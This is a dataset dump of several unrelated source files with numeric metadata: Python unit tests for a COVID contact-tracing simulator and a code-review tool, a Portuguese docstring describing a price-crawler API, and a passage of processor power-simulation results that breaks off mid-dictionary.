| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
c5b138c547fa952cae37fcd4f70a3d91d9e874e6
| 10,825
|
py
|
Python
|
tests/test_should_send_message_gaen.py
|
mila-iqia/COVI-AgentSim
|
7e4dea42ad9c5dd251aa8d7546c647ad4f173d28
|
[
"Apache-2.0"
] | 13
|
2020-10-25T20:15:25.000Z
|
2022-03-14T06:34:32.000Z
|
tests/test_should_send_message_gaen.py
|
mila-iqia/COVI-AgentSim
|
7e4dea42ad9c5dd251aa8d7546c647ad4f173d28
|
[
"Apache-2.0"
] | 6
|
2020-10-30T02:09:48.000Z
|
2022-03-09T12:48:22.000Z
|
tests/test_should_send_message_gaen.py
|
mila-iqia/COVI-AgentSim
|
7e4dea42ad9c5dd251aa8d7546c647ad4f173d28
|
[
"Apache-2.0"
] | 6
|
2020-10-29T15:36:40.000Z
|
2021-12-05T18:06:45.000Z
|
import datetime
import numpy as np
import unittest
from covid19sim.locations.city import City
class DummyContactBook(object):
pass
class DummyHuman(object):
pass
class DummyCity(object):
pass
class ShouldSendMessageGaenTests(unittest.TestCase):
def test_intervention_day(self):
"""
check returns false if not far enough from intervention day
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 2
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=10,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 12, 1: 1}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
city.conf["INTERVENTION_DAY"] = 9
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
def test_last_update(self):
"""
check returns false if last update is too recent
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 2
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 12, 1: 1}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
def test_should_send_risk_change_true_det(self):
"""
check returns True when we are in the last bucket and that bucket is smaller than the total message budget
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 1000, 1: 1}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertTrue(res)
def test_last_bucket_prob(self):
"""
check that when the last bucket is larger than the message budget, the messages actually sent equal the budget for this update (total budget / UPDATES_PER_DAY)
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=1,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 60, 1: 40}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
results = []
for i in range(1000):
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
results.append(res)
if res:
if cur_day not in city.sent_messages_by_day:
city.sent_messages_by_day[cur_day] = 0
city.sent_messages_by_day[cur_day] += 1
self.assertAlmostEqual(1 / 4, np.mean(results), 2)
def test_middle_bucket_prob(self):
"""
checks that when we are in the second-to-last bucket and the last bucket is smaller than
the budget, the messages sent correspond to the number of remaining messages
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=1,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 50, 1: 40, 2: 10}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
results = []
for i in range(1000):
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
results.append(res)
if res:
if cur_day not in city.sent_messages_by_day:
city.sent_messages_by_day[cur_day] = 0
city.sent_messages_by_day[cur_day] += 1
# allowed messages: 100 / 4 = 25
# already sent messages: 10
# remaining to send for second bucket: 15
self.assertAlmostEqual(1 / 4 - 10 / 100, np.mean(results), 2)
def test_middle_bucket_last_is_full(self):
"""
If the last bucket is larger than the budget, then no messages are sent when in the second-largest bucket
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 1 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=1,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=1,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 40, 1: 20, 2: 40}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
self.assertFalse(res)
def test_last_bucket_low_budget(self):
"""
Everything still works with a very low budget
"""
cur_day = 10
daily_update_message_budget_sent_gaen = 0
current_timestamp = datetime.datetime.now()
risk_change = 2 # risk_change HAS to be in risk_change_histogram
city = DummyCity()
city.conf = dict(
BURN_IN_DAYS=2,
DAYS_BETWEEN_MESSAGES=2,
INTERVENTION_DAY=5,
UPDATES_PER_DAY=4,
MESSAGE_BUDGET_GAEN=0.01,
n_people=1000,
)
city.rng = np.random.RandomState(0)
city.risk_change_histogram = {0: 40, 1: 20, 2: 40}
city.risk_change_histogram_sum = sum(city.risk_change_histogram.values())
city.sent_messages_by_day = {cur_day: daily_update_message_budget_sent_gaen}
human = DummyHuman()
human.contact_book = DummyContactBook()
human.contact_book.latest_update_time = current_timestamp - datetime.timedelta(days=cur_day)
results = []
for i in range(1000):
res = City._check_should_send_message_gaen(
city,
current_day_idx=cur_day,
current_timestamp=current_timestamp,
human=human,
risk_change_score=risk_change,
)
results.append(res)
if res:
if cur_day not in city.sent_messages_by_day:
city.sent_messages_by_day[cur_day] = 0
city.sent_messages_by_day[cur_day] += 1
self.assertAlmostEqual(city.conf["MESSAGE_BUDGET_GAEN"] / 4, np.mean(results), 2)
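# Not in the original file: a standard unittest entry point so the module can also be
# run directly (e.g. `python tests/test_should_send_message_gaen.py`) instead of only
# through a test runner.
if __name__ == "__main__":
    unittest.main()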
| 35.963455
| 141
| 0.617367
| 1,307
| 10,825
| 4.76052
| 0.110941
| 0.085182
| 0.070235
| 0.070235
| 0.848441
| 0.834298
| 0.834298
| 0.834298
| 0.82369
| 0.82369
| 0
| 0.026056
| 0.308637
| 10,825
| 300
| 142
| 36.083333
| 0.805318
| 0.083695
| 0
| 0.819672
| 0
| 0
| 0.003592
| 0
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.028689
| false
| 0.012295
| 0.016393
| 0
| 0.061475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5de9b719b25ff84ca2c5de324a90154fcdb6ab5
| 1,499
|
py
|
Python
|
testing/tests/001-main/004-extensions/002-tests/001-tutorial.py
|
fekblom/critic
|
a6b60c9053e13d4c878d50531860d7389568626d
|
[
"Apache-2.0"
] | 216
|
2015-01-05T12:48:10.000Z
|
2022-03-08T00:12:23.000Z
|
testing/tests/001-main/004-extensions/002-tests/001-tutorial.py
|
fekblom/critic
|
a6b60c9053e13d4c878d50531860d7389568626d
|
[
"Apache-2.0"
] | 55
|
2015-02-28T12:10:26.000Z
|
2020-11-18T17:45:16.000Z
|
testing/tests/001-main/004-extensions/002-tests/001-tutorial.py
|
fekblom/critic
|
a6b60c9053e13d4c878d50531860d7389568626d
|
[
"Apache-2.0"
] | 34
|
2015-05-02T15:15:10.000Z
|
2020-06-15T19:20:37.000Z
|
frontend.page("tutorial",
expect={ "document_title": testing.expect.document_title(u"Tutorials"),
"content_title": testing.expect.paleyellow_title(0, u"Tutorials"),
"pageheader_links": testing.expect.pageheader_links("anonymous",
"extensions"),
"script_user": testing.expect.script_no_user() })
frontend.page("tutorial",
params={ "item": "extensions" },
expect={ "document_title": testing.expect.document_title(u"Critic Extensions"),
"content_title": testing.expect.paleyellow_title(0, u"Critic Extensions"),
"pageheader_links": testing.expect.pageheader_links("anonymous",
"extensions"),
"script_user": testing.expect.script_no_user() })
frontend.page("tutorial",
params={ "item": "extensions-api" },
expect={ "document_title": testing.expect.document_title(u"Critic Extensions API"),
"content_title": testing.expect.paleyellow_title(0, u"Critic Extensions API"),
"pageheader_links": testing.expect.pageheader_links("anonymous",
"extensions"),
"script_user": testing.expect.script_no_user() })
| 65.173913
| 101
| 0.515677
| 121
| 1,499
| 6.165289
| 0.190083
| 0.209115
| 0.152815
| 0.104558
| 0.936997
| 0.936997
| 0.936997
| 0.936997
| 0.819035
| 0.819035
| 0
| 0.003185
| 0.371581
| 1,499
| 22
| 102
| 68.136364
| 0.788747
| 0
| 0
| 0.6
| 0
| 0
| 0.246164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
68071176a175e2c6603c56d48bbf2bc4e29e1ba9
| 4,913
|
py
|
Python
|
docstring.py
|
LeonardoGazziro/crawler_precos
|
38c40bbbe1f9b2fa4b0cdecbbc9114762f4fa462
|
[
"MIT"
] | null | null | null |
docstring.py
|
LeonardoGazziro/crawler_precos
|
38c40bbbe1f9b2fa4b0cdecbbc9114762f4fa462
|
[
"MIT"
] | null | null | null |
docstring.py
|
LeonardoGazziro/crawler_precos
|
38c40bbbe1f9b2fa4b0cdecbbc9114762f4fa462
|
[
"MIT"
] | null | null | null |
DOC_STRING = {
"DADOS SOBRE A API": {
"ENDPOINTS": ["inserir_produto", "listar_produtos", "alterar_preco_aviso",
"ver_info_produto", "ver_ultimos_precos", "ver_ultimo_preco_prod"],
"DESCRICAO DOS ENDPOINTS": {
"INSERIR PRODUTO": {
"endpoint": "/inserir_produto",
"metodo": "POST",
"payload": "JSON",
"descricao": "Insere um novo produto para pesquisa no Crawler",
"exemplo": ""
},
"LISTAR PRODUTOS": {
"endpoint": "/listar_produtos",
"metodo": "GET",
"descricao": "Retorna a lista de produtos que estão sendo pesquisados pelo crawler."
},
"ALTERAR PRECO AVISO": {
"endpoint": "/alterar_preco_aviso",
"metodo": "POST",
"payload": "JSON",
"descricao": "altera o valor de aviso de um produto",
"exemplo": ""
},
"VER INFO PRODUTO": {
"endpoint": "/ver_info_produto/{id_produto}",
"metodo": "GET",
"descricao": "retorna as informações de um produto, limite, nome e lista de links que estão sendo crawleadas"
},
"VER ULTIMOS PRECOS": {
"endpoint": "/ver_ultimos_precos",
"metodo": "GET",
"descricao": "Retorna o JSON com os ultimos preços crawleados"
},
"VER ULTIMO PRECO DO PRODUTO": {
"endpoint": "/ver_ultimo_preco_prod/{id_produto}",
"metodo": "GET",
"descricao": "retorna o ultimo preço de um produto utilizando o id do produto"
}
},
"TEXT": "Conteudo destinado ao estudo de Python e utilização de micro serviços na nuvem da AWS.",
"CREATED BY": "Leonardo Roberto Gazziro",
"LINKEDIN": "www.linkedin.com/in/leonardo-roberto-gazziro",
"GITHUB": "https://github.com/LeonardoGazziro"
}
}
"""
DADOS SOBRE A API
====================================================================================================================
ENDPOINTS:
inserir_produto | listar_produtos | alterar_preco_aviso
ver_info_produto | ver_ultimos_precos | ver_ultimo_preco_prod
DESCRICAO DOS ENDPOINTS:
################################################################################################################
INSERIR PRODUTO:
endpoint: /inserir_produto
metodo: POST
payload: JSON
descricao: Insere um novo produto para pesquisa no Crawler
exemplo:
{
"product": "NOME DO PRODUTO",
"wanted_price": valor do produto (INTEIRO),
"links": [
"link americanas",
"link submarino"
]
}
LISTAR PRODUTOS:
endpoint: /listar_produtos
metodo: GET
descricao: Retorna a lista de produtos que estão sendo pesquisados pelo crawler.
ALTERAR PRECO AVISO:
endpoint: /alterar_preco_aviso
metodo: POST
payload: JSON
descricao: altera o valor de aviso de um produto
exemplo:
{
"product_id" ID_DO_PRODUTO,
"new_warning_price": NOVO VALOR DE AVISO (INTEIRO)
}
VER INFO PRODUTO:
endpoint: /ver_info_produto/{id_produto}
metodo: GET
payload: -
descricao: retorna as informações de um produto, limite, nome e lista de links que estão sendo crawleadas
VER ULTIMOS PRECOS:
endpoint: /ver_ultimos_precos
metodo: GET
payload: -
descricao: Retorna o JSON com os ultimos preços crawleados
VER ULTIMO PRECO DO PRODUTO:
endpoint: /ver_ultimo_preco_prod/{id_produto}
metodo: GET
payload: -
descricao: retorna o ultimo preço de um produto utilizando o id do produto
====================================================================================================================
Conteudo destinado ao estudo de Python e utilização de micro serviços na nuvem da AWS.
####################################################################################################################
*** Created by: Leonardo Roberto Gazziro ***
*** LinkedIn: www.linkedin.com/in/leonardo-roberto-gazziro ***
*** GitHub: https://github.com/LeonardoGazziro ***
####################################################################################################################
"""
| 43.096491
| 125
| 0.46265
| 414
| 4,913
| 5.357488
| 0.229469
| 0.032462
| 0.037872
| 0.056357
| 0.927863
| 0.927863
| 0.921551
| 0.915239
| 0.915239
| 0.915239
| 0
| 0
| 0.343578
| 4,913
| 114
| 126
| 43.096491
| 0.687752
| 0
| 0
| 0.217391
| 0
| 0
| 0.563557
| 0.062832
| 0
| 0
| 0
| 0.052632
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a876708ec0716560c97c3cd4551ee63f97211c20
| 68,613
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_libquantum/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_libquantum/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_libquantum/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.153579,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.265942,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.152525,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.572046,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.151806,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.15783,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00556734,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0402589,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0411739,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0402589,
'Execution Unit/Register Files/Runtime Dynamic': 0.0467412,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.097282,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.274895,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 1.50175,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00132945,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00132945,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116592,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000455709,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000591466,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0044163,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0124618,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0395815,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.51772,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.179527,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.134437,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.8603,
'Instruction Fetch Unit/Runtime Dynamic': 0.370423,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0642931,
'L2/Runtime Dynamic': 0.0193234,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91435,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.356003,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.02191,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0219099,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
